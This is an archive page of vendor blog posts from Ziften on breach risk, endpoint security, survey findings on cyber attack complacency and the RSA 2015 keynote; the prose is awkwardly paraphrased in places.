Monthly Archives: May 2015

Charles Leaver – Organizations Are Now At Extreme Risk Of Data Breaches So Policies To Prevent This Must Be Followed

By Ziften CEO Charles Leaver

For United States businesses the occurrence of a significant cyber attack and consequential data leakage is looking more like “when” instead of “if”, because of the new threats that are presenting themselves with fragmented endpoint strategies, cloud computing and data intensive applications. All too often companies are neglecting or inadequately addressing vulnerabilities that are understood to them, and with aging IT assets that are not correctly protected the cyber lawbreakers begin to take notice.

The variety of data breaches that are taking place is extremely disturbing. In a report from the Verizon Risk Team there were 855 substantial breaches which resulted in 174 million records being lost back in 2011. The stakes are extremely high for companies that deal with personally identifiable info (PII), due to the fact that if staff members are not informed on compliance and inadequate endpoint data protection procedures are in place then costly legal action is most likely to occur.

” The likelihood of a data breach or personal privacy issue taking place in any organization has ended up being a virtual certainty,” Jeffrey Vagle, legal expert writing for Mondaq mentioned. He recommended that record keepers have to reconsider their approach to network and device security, staff member data access controls and the administration of PII info. The increase in the use of cloud services can make the avoidance of data breaches more of a challenge, as these services enable the enormous exchange of information each time. It would just take one incident and millions of files could be lost.

Known Vulnerabilities Require Focus

A lot of IT departments fret continuously about zero day attacks that will cause a data breach and catch them off guard. As an example of this, Dirk Smith of Network World wrote about an Adobe Acrobat exploit that opened the door for hackers to perform sophisticated surveillance. A great deal of IT vulnerabilities can come when a software application is not patched up to date, and a great deal of zero day hazards can happen from weaknesses in legacy code which includes a bug in Windows which targeted features that were first presented Twenty Years earlier.

Security professional, Jim Kennedy wrote in a Continuity Central post “something that I have found is that many of the breaches and intrusions which succeeded did so by attacking known vulnerabilities that had actually been identified and had been around for several years: not from some advanced ‘zero-day’ attack which was unidentified and unknown until just the other day by the security community at large.” “And, much more troubling, social engineering continues to be a most successful method to begin and/precipitate an attack.”

Now the cyber criminal fraternity has access to an extensive series of pre packaged malware. These tools have the ability to perform network and computer system analytics that are complicated in nature and after that suggest the ideal attack technique. Another threat is a human one, where workers are not trained properly to evaluate out calls or messages from individuals who lie about belonging to the technical support group of an external security company.

It is certainly very important to proactively resist zero day attacks with robust endpoint protection software, however likewise organizations need to integrate reliable training and processes with the hardware and software solutions. While many organizations will have a number of security policies in place there is generally an issue with enforcing them. This can lead to dangerous fluctuations in the movement of data and network traffic that should be examined by security personnel being neglected and not being attended to.


Charles Leaver – Widespread Cyber Attacks Are Now Starting At Organization Endpoints

From The Desk Of Charles Leaver CEO Ziften Technologies


With the arrival of bring your own device (BYOD) techniques and cloud computing the securing of specific endpoints has actually become more difficult, as administrators could be making ease of data access of higher importance over security. The risks are there nevertheless, because most of the current generation of endpoint security software have not been modified to protect from aggressive hacking and malicious cyber attack methods that target specific endpoints as the launch pad for attacks that are commonly distributed.

There was a very well-known endpoint attack that took place in recent times where a malware strain called Comfoo was utilized to jeopardize the networks of many multinational organizations back in 2010. The Comfoo malware consisted of a variety of custom developed backdoor Trojans and exploits that could constantly disperse malware. A more serious repercussion was that this malware could cause harmful data leakage by scraping account and network details and monitor all user input, according to CRN contributor Robert Westervelt. It is thought that the Comfoo malware could have been a part of an advanced cyber espionage campaign, because of the approach that was used and the evasion of standard endpoint tracking.

Using email phishing and social engineering the malware was able to compromise targeted gadgets, which highlights how ripe endpoints have become for malware infiltration, so says Jason O’Reilly, security executive. When he was speaking to ITWeb, O’Reilly said that traditional endpoint software does not sufficiently account for access from locations beyond the IT department most of the time, and it does not limit data exposure to authorized individuals through using access controls.

O’Reilly mentioned that “endpoint security solutions need to provide layered security that goes beyond signature-based detection just to consist of heuristic-based detection and polymorphic-based detection.” “Today’s networks are exposed to hazards from many different sources.”

Real Time Risk Capturing And Report Creation

The high stakes for control methods and endpoint security were recognized by business consulting firm Frost & Sullivan, as they felt both of these areas were under pressure from both external attackers and the pressing demand from workers for gadget choice versatility.

Chris Rodriguez, Frost & Sullivan analyst mentioned “business IT departments now deal with significant pressure to enable staff members to access the corporate network and files from their own personal devices.” “Considering their seemingly omnipresent nature, quick data connections, and effective hardware and os, these devices represent prime targets for hackers.”

When asked exactly what organizations can do to tighten up on the special weaknesses of mobile hardware, O’Reilly advised that any services need to supply clear and extensive visibility into what is happening on each endpoint so that action can be taken rapidly when any dangers are found.


Charles Leaver – In A Survey Two Thirds Of Organizations Claimed That They Were Immune From Cyber Attacks

By Charles Leaver Ziften Technologies CEO

A a great deal of companies have the belief that there is no requirement for them to pursue assiduous data loss avoidance, they relate to cyber attacks as either really unlikely to happen or have minimal financial effect if they do occur. There is an increase in the recorded cases of cyber attacks and advanced consistent risks have actually contributed to this complacency. These harmful attacks have the tendency to avert standard endpoint security software applications, and while they do not have the teeth of denial-of-service attacks, they have the potential to cause considerable damage.

Over 67% of companies declare that they have not been the victims of a cyber attack in the last 18 months, or that they had little or no visibility into whether an attack had actually jeopardized their network according to Infosecurity. The organizers of the study were skeptical about the results and highlighted the various susceptible desktop and mobile endpoints that are now very common in businesses.

Security professional and study planner Tom Cross stated “Any system you link to the Internet is going to be targeted by attackers very rapidly afterwards.” “I would assert that if you’re uncertain whether or not your company has had a security occurrence, the possibilities are extremely high that the answer is yes.”

Around 16% stated that they had actually experienced a DDoS attack over the very same duration, and 18% reported malware infiltrations. Regardless of this, most of the organizations assessed the effects as small and not justifying the installation of new endpoint security and control systems. Approximately 38% stated that they had not experienced discovered security breaches, and only 20% did confess to financial losses.

The loss of reputation was more extensive, impacting around 25% of the participants. Highlighting the possible effect of a cyber attack on financial resources and reputation, an incident at The University of Delaware resulted in 74,000 individuals having their delicate data exposed, according to Amy Cherry, WDEL contributor. The hackers targeted the school’s website and scraped details about university identifications and Social Security Numbers, which made it supply complimentary credit monitoring of the affected parties.


Cyber Security Using Dark Ages Methods Must Be Moved Away From Confirms RSA President – Charles Leaver

Written By Dr Al Hartmann And Presented By Charles Leaver CEO Ziften Technologies

A 5 Point Plan For A New Security Approach Proposed By Amit Yoran

Amit Yoran’s, RSA President provided an excellent keynote speech at the RSA Conference which reinforced the Ziften strategy. Ziften is intently focused on continuous endpoint monitoring, silo-busting Ziften Open Visibility ™, risk-focused security analytics, and to provide robust defenses in a brand-new era of advanced cyber attacks. Present organization security strategy was slammed as being bogged down in the Dark Ages of cyber moats and castle walls by Yoran, it was described as an “impressive fail”, and he outlined his vision for the future with 5 main points, and commentary from Ziften’s point of view has been included.

Stop Believing That Even Advanced Protections Are Sufficient

” No matter how high or smart the walls, focused adversaries will discover methods over, under, around, and through.”

A lot of the previous, more advanced attacks did not utilize malware as the main method. Conventional endpoint anti-viruses, firewalls and conventional IPS were slammed by Yoran as examples of the Dark Ages. He stated that these legacy defenses could be easily scaled by skilled hackers and that they were largely inadequate. A signature based anti-virus system can only safeguard against formerly seen hazards, but unseen dangers are the most threatening to an organization (given that they are the most typical targeted attacks). Targeted cyber lawbreakers utilize malware only 50% of the time, maybe just quickly, at the start of the attack. The attack artifacts are easily changed and not utilized ever again in targeted attacks. The build-up of transient indicators of compromise and malware signatures in the billions in large anti-viruses signature databases is a pointless defensive approach.

Adopt a Deep and Prevalent Level of True Visibility Everywhere – from the Endpoint to the Cloud

“We require pervasive and true visibility into our business environments. You just can’t do security today without the visibility of both continuous complete packet capture and endpoint compromise evaluation visibility.”

This means continuous endpoint monitoring across the enterprise endpoint population for generic indicators of compromise (not stale attack artifacts) that reflect classic methods, not short lived hex string happenstance. And any company executing consistent full packet capture (comparatively costly) can easily pay for endpoint threat assessment visibility (relatively economical). The logging and auditing of endpoint process activity supplies a wealth of security insight using just primary analytics techniques. A targeted hacker relies on the relative opacity of endpoint user and system activity to mask and hide any attacks – while true visibility provides an intense light.

Identity and Authentication Matter More than Ever

” In a world with no perimeter and with less security anchor points, identity and authentication matter even more … At some point in [any effective attack] campaign, the abuse of identity is a stepping stone the aggressors utilize to enforce their will.”

The use of stronger authentication fine, but it just makes for bigger walls that are still not impenetrable. What the hacker does when they overcome the wall is the most essential thing. The tracking of user endpoint logins (both local and remote), and the engagement of applications for indications of unusual user activity (insider attack or possible jeopardized credentials). Any activity that is observed that is different from normal patterns is possibly suspicious. One departure from normality does not make a case, but security analytics that triangulates several normality departures concentrates security attention on the highest risk abnormalities for triage.

External Risk Intelligence Is A Core Capability

” There are incredible sources for the best risk intelligence … [which] need to be machine-readable and automated for increased speed and leverage. It needs to be operationalized into your security program and tailored to your company’s assets and interests so that analysts can quickly deal with the threats that posture the most risk.”

Many targeted attacks normally do not utilize readily signatured artifacts again or recycle network addresses and C2 domains, but there is still worth in risk intelligence feeds that aggregate timely discoveries from millions of endpoint and network threat sensors. Here at Ziften we integrate third party risk feeds by means of the Ziften Knowledge Cloud, plus the direct exposure of Ziften discoveries into SIEM and other enterprise security and operations infrastructure via our Open Visibility ™ architecture. With the evolving of more machine-readable risk intelligence (MRTI) feeds, this capability will successfully grow.

Understand What Matters Most To Your Business And Exactly what Is Mission Critical

” You need to comprehend exactly what matters to your organization and what is mission critical. You have to … protect exactly what’s important and protect it with everything you have.”

This holds true for threat driven analytics and instrumentation that focuses security attention and effort on areas of highest business threat exposure. Yoran advocates that asset value prioritization is only one side of business risk analysis, and that this goes much deeper, both pragmatically and academically. Security analytics that focus security staff attention on the most common dynamic risks (for instance by filtering, associating and scoring SIEM alert streams for security triage) need to be well-grounded in all sides of business threat analysis.

At Ziften we applaud Amit Yoran’s messages in his RSA 2015 keynote address as the cyber security market evolves beyond the present Dark Ages of facile targeted attacks and established exploitations.